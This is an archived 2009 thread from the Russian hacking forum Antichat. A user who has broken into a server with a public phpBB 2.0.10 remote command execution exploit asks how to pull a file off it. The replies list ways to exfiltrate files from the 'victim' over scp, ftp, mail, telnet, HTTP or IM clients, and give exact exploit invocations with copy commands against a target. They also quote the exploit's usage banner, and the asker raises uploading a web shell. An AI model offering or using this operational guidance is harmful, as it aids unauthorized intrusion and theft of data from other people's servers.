Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Как можно копировать файл с помощью сплоита ? (https://forum.antichat.xyz/showthread.php?t=116132)

Zipper-rus 16.04.2009 00:06
Как можно копировать файл с помощью сплоита ?
 
Вообщем юзаю http://milw0rm.com/id.php?id=647 сплоит, на серв норм зашёл а как можно скопировать файл с сервера ко мне на комп, например на серве есть файл manual.txt и я его хочу скопировать ! Возможно ли ?

ghostwizard 16.04.2009 06:07
Можно
ssh: команда scp.
ftp: настраиваем ftp-сервер либо у жертвы либо у себя, потом команда ftp.
email: отправляем от жертвы. команды mail.
telnet: аналогично с ftp.
http: вынос файла в дирикторию доступную по http. либо проверяем есть ли у жертвы клиенты lynx, links, elinks.
IM-клиенты: если есть в наличии у жертвы.

Ну и доки с википедии по выбронному пути в помощь.
+ man <команда>

Sethack 16.04.2009 08:24
А .php файл реально скопиравать на комп или скопировать код который содержится в файле? например ,,,,сайт.ru/manual.php. Если это возможно объясните по подробнее как это воплотить в реальность!

Zipper-rus 16.04.2009 12:48
Ну значит с помощью сплоита никак ? Ну тогда можно с помощью сплоита залить шелл ??

$n@ke 16.04.2009 16:51
Во-первых - прочитай про команды той ОС, на которой стоит форум.
Во вторых и третьих:
2.если *nix , то судя по примеру в сплойте, делаешь так r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cp manual.php manual.txt" и открываешь в браузере
3. если Win, то r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "copy manual.php manual.txt"
Это лишь один из вариантов, наиболее простой в понимании для тебя.

2 ТС - открыть файл для просмотра
для *nix: cat file.ext
для Win: type file.ext или more file.ext

2ghostwizard , может ты еще напишешь как ssh поднять и туннелирование в TCP|IP забульбенить? ппц

Разбирайтесь сами кому чего.

4adr0s 16.04.2009 17:38
ТС, знаешь ты кто? Ты или болван, или лентяй!

Ты хоть удосужился пробежаться моргалками по тексту сплоита?

Цитата:
################################################## ##########
phpBB <=2.0.10 remote command execution exploit
by RusH security team // www.rst.void.ru
################################################## ##########
usage:
r57phpbb2010.pl [URL] [DIR] [NUM] [CMD]
params:
[URL] - server url e.g. www.phpbb.com
[DIR] - directory where phpBB installed e.g. /phpBB/ or /
[NUM] - number of existing topic
[CMD] - command for execute e.g. ls or "ls -la"
################################################## ##########
Далее, см. предыдущий пост

Zipper-rus 16.04.2009 21:31
2 4adr0s >>> и к чему ты свой пост написал ? Я чё написал что немогу запустить сплоит или набрать команду для вывода файлов на серве с их правами ?

4adr0s 16.04.2009 22:45
Цитата:
Сообщение от Zipper-rus
Вообщем юзаю http://milw0rm.com/id.php?id=647 сплоит, на серв норм зашёл а как можно скопировать файл с сервера ко мне на комп, например на серве есть файл manual.txt и я его хочу скопировать ! Возможно ли ?

Цитата:
Сообщение от $n@ke
Во-первых - прочитай про команды той ОС, на которой стоит форум.
Во вторых и третьих:
2.если *nix , то судя по примеру в сплойте, делаешь так r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "cp manual.php manual.txt" и открываешь в браузере
3. если Win, то r57phpbb2010.pl www.phpbb.com /phpBB/ 239819 "copy manual.php manual.txt"
Это лишь один из вариантов, наиболее простой в понимании для тебя.

2 ТС - открыть файл для просмотра
для *nix: cat file.ext
для Win: type file.ext или more file.ext

2ghostwizard , может ты еще напишешь как ssh поднять и туннелирование в TCP|IP забульбенить? ппц

Разбирайтесь сами кому чего.
Пока писал свое, за меня уже написали.


Время: 02:43